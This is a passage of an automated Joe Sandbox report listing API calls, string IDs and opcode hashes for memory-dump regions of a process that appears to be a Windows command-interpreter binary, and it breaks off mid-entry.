                                                                              • Opcode Fuzzy Hash: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                                                                              • Instruction Fuzzy Hash: F0718B20E0D68685FB6CBF68E844279B6A0AF1C750F546935D53EC66F3EF7CA8818740
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                              • String ID:
                                                                              • API String ID: 4268342597-0
                                                                              • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                              • Instruction ID: 714fba376f185e127b50bb2ea7383be33fa188cff2b4eb804aa93f92d3d311d0
                                                                              • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                              • Instruction Fuzzy Hash: 8D816C62A1C78281EB68BF26E440239B7A0FF4DB84F185535CA6D83776DF7DE8518700
                                                                              APIs
                                                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF64B56F52A,00000000,00000000,?,00000000,?,00007FF64B56E626,?,?,00000000,00007FF64B571F69), ref: 00007FF64B56F8DE
                                                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56F8FB
                                                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56F951
                                                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56F96B
                                                                              • wcschr.MSVCRT ref: 00007FF64B56FA8E
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B56FB14
                                                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56FB2D
                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56FBEA
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B56F996
                                                                                • Part of subcall function 00007FF64B570010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF64B58849D,?,?,?,00007FF64B58F0C7), ref: 00007FF64B570045
                                                                                • Part of subcall function 00007FF64B570010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF64B58F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B570071
                                                                                • Part of subcall function 00007FF64B570010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B570092
                                                                                • Part of subcall function 00007FF64B570010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B5700A7
                                                                                • Part of subcall function 00007FF64B570010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B570181
                                                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D401
                                                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D41B
                                                                              • longjmp.MSVCRT(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D435
                                                                              • longjmp.MSVCRT(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D480
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                              • String ID: =,;
                                                                              • API String ID: 3964947564-1539845467
                                                                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                              • Instruction ID: 421f77af8a3c3a21ca19ad1f52935a35acb7f09422c5c15793e4559b239ac18e
                                                                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                              • Instruction Fuzzy Hash: 25024661A0DA42CAEA1CBF21E840278F6A1BF8DB54F549135D93ED62F6DF3DA401CB10
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$iswspacewcschr
                                                                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                              • API String ID: 840959033-3627297882
                                                                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                              • Instruction ID: f4b2be1440e4a2e176c166eac6cca841f39d128a833dca5544816be94ce614fd
                                                                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                              • Instruction Fuzzy Hash: FAD16B61E0C643C6FB6CBF25E8152B9A6A1AF4CB44F449035DA2DC62B7DF7CE8458710
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: iswdigitiswspacewcschr
                                                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                              • API String ID: 1595556998-2755026540
                                                                              • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                              • Instruction ID: 504bfa70ac971cd2f40a3c916c3831cbd9298853d9427b2aaa16edaa6a76596a
                                                                              • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                              • Instruction Fuzzy Hash: C1226BA5E0D75685FA6C7F25E884279F6A0BF0D790F40A132D9ADC62F6DF3CA4418B10
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$EnvironmentVariable
                                                                              • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                              • API String ID: 198002717-2301591722
                                                                              • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                              • Instruction ID: f808de9d64bcffd8169ddeeebaee65ca474548aaa856adfab1ed2f799f13d13d
                                                                              • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                              • Instruction Fuzzy Hash: 8B51ECA5B0C643C6E658BF65E810179EBA1EF4DB81F48A075CA2E836B6DF6CE444C740
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                              • String ID: "$=,;
                                                                              • API String ID: 3545743878-4143597401
                                                                              • Opcode ID: b3fa525c0aa7c573df7f7b2f39b769da54eaf45f3e5e9f5bf37a15d8f9aec30a
                                                                              • Instruction ID: c3fc958a915f324581675012c1bd4257988e8b7490f497a7f3ed3a9524743fda
                                                                              • Opcode Fuzzy Hash: b3fa525c0aa7c573df7f7b2f39b769da54eaf45f3e5e9f5bf37a15d8f9aec30a
                                                                              • Instruction Fuzzy Hash: 10C19C61A0DA5282EB6D7F11D000379F6A0FF5DB45F04A835CA6E827F6EF7CA445D200
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentFormatMessageThread
                                                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                              • API String ID: 2411632146-3173542853
                                                                              • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                              • Instruction ID: 353ffd8731c63b0e481621a846066d8f4ea9beceb2fdf178cca84931b9696630
                                                                              • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                              • Instruction Fuzzy Hash: 7C616BA1A2D782C1EA68FF51E4041A5A7A0FB4CB88F440536DE2D87776CF3CE6658B00
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile_open_osfhandle
                                                                              • String ID: con
                                                                              • API String ID: 2905481843-4257191772
                                                                              • Opcode ID: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                                                                              • Instruction ID: 6ba494bca276d72e9774ba4305e3f71ecdfb98036bcecbecf68fdd85987393aa
                                                                              • Opcode Fuzzy Hash: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                                                                              • Instruction Fuzzy Hash: B9717172B0C681CAE764BF14F440679FAA0FB8EB61F548234DA6E826B5DF7DD4458B00
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                              • String ID:
                                                                              • API String ID: 3829876242-3916222277
                                                                              • Opcode ID: 10a5b567e72863909b04e51aaf43edd524101fd282eaa5692d28ef0ea38d911e
                                                                              • Instruction ID: 6f95ce807a5968700f4bdc64b71c199c9d12692151fd98ddc97fc598f9ba0539
                                                                              • Opcode Fuzzy Hash: 10a5b567e72863909b04e51aaf43edd524101fd282eaa5692d28ef0ea38d911e
                                                                              • Instruction Fuzzy Hash: 2B617D22A1C642C6EA18BF12D40417AB7A0FF8DB94F459134DA2E837A6DF3CE9058B00
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                              • String ID: CSVFS$NTFS$REFS
                                                                              • API String ID: 3510147486-2605508654
                                                                              • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                              • Instruction ID: c957023f31f3281c1313d8f512ccf751226a479105bf3a0297e010df963bfa69
                                                                              • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                              • Instruction Fuzzy Hash: 0D616F72708BC2DAEB69AF21D8443E9B7A4FB49B84F449135CA1D8B769DF78D204C700
                                                                              APIs
                                                                              • longjmp.MSVCRT(?,00000000,00000000,00007FF64B567279,?,?,?,?,?,00007FF64B56BFA9), ref: 00007FF64B584485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: longjmp
                                                                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                              • API String ID: 1832741078-366822981
                                                                              • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                              • Instruction ID: b2a814f1c05ce27a6c3bd5c7ee23b2435e739b361f6a4d5c7a09bcc8450fcfc2
                                                                              • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                              • Instruction Fuzzy Hash: D0C17A60F1C642C1E62CFF1AE5946BCA791AB4EB84F905136DD2DD36B7CF2CA8568340
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heapwcschr$AllocateProcessmemset
                                                                              • String ID: -$:.\$=,;$=,;+/[] "
                                                                              • API String ID: 2060774286-969133440
                                                                              • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                              • Instruction ID: e0db9839304129c6e3fd933131e4b5be3774ae694d2c61209a0e3586cc87fce8
                                                                              • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                              • Instruction Fuzzy Hash: C2B18121A0DA8282FA68BF15D145279A7A0FF4CB80F556235CA6EC77F6DF7CE8458700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ErrorLast$InformationVolume
                                                                              • String ID: %04X-%04X$~
                                                                              • API String ID: 2748242238-2468825380
                                                                              • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                              • Instruction ID: 4e1cd14ee5ec8e4b9c4fef80716dadf6fcd94101f4ecf1f9e8bb29bd70580ec9
                                                                              • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                              • Instruction Fuzzy Hash: 31A1856270CBC1CAEB29BF21D8402E9B7A1FB89784F448535DA5D8B76ADF3CD6458700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                              • String ID: FAT$~
                                                                              • API String ID: 2238823677-1832570214
                                                                              • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                              • Instruction ID: 1e1c33a33b41c89faf54a63ce17b0e2a9666f475d47c7b4080c7b3595db69e24
                                                                              • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                              • Instruction Fuzzy Hash: 4D717E7270CBC1CAEB25FF21D8502E9B7A0FB49789F409035DA5D8BA6ADF38D2458700
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D884
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D89D
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D94D
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D964
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B56DB89
                                                                              • wcstol.MSVCRT ref: 00007FF64B56DBDF
                                                                              • wcstol.MSVCRT ref: 00007FF64B56DC63
                                                                              • memmove.MSVCRT ref: 00007FF64B56DD33
                                                                              • memmove.MSVCRT ref: 00007FF64B56DE9A
                                                                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56DF1F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                              • String ID:
                                                                              • API String ID: 1051989028-0
                                                                              • Opcode ID: 3eb282f1936630003c50c214bbc81d4f8471c73227843184e7e06612691cab38
                                                                              • Instruction ID: 0ccf1a15dab43e25d3d38d7324605d10d2707ac0c680f3b2295f853f4b43bc93
                                                                              • Opcode Fuzzy Hash: 3eb282f1936630003c50c214bbc81d4f8471c73227843184e7e06612691cab38
                                                                              • Instruction Fuzzy Hash: EC028072A0C68681EA28BF15E40027AF6A0FB8CB94F546631DAAE877F5DF7CD441D700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$_wcsicmp$AllocProcess
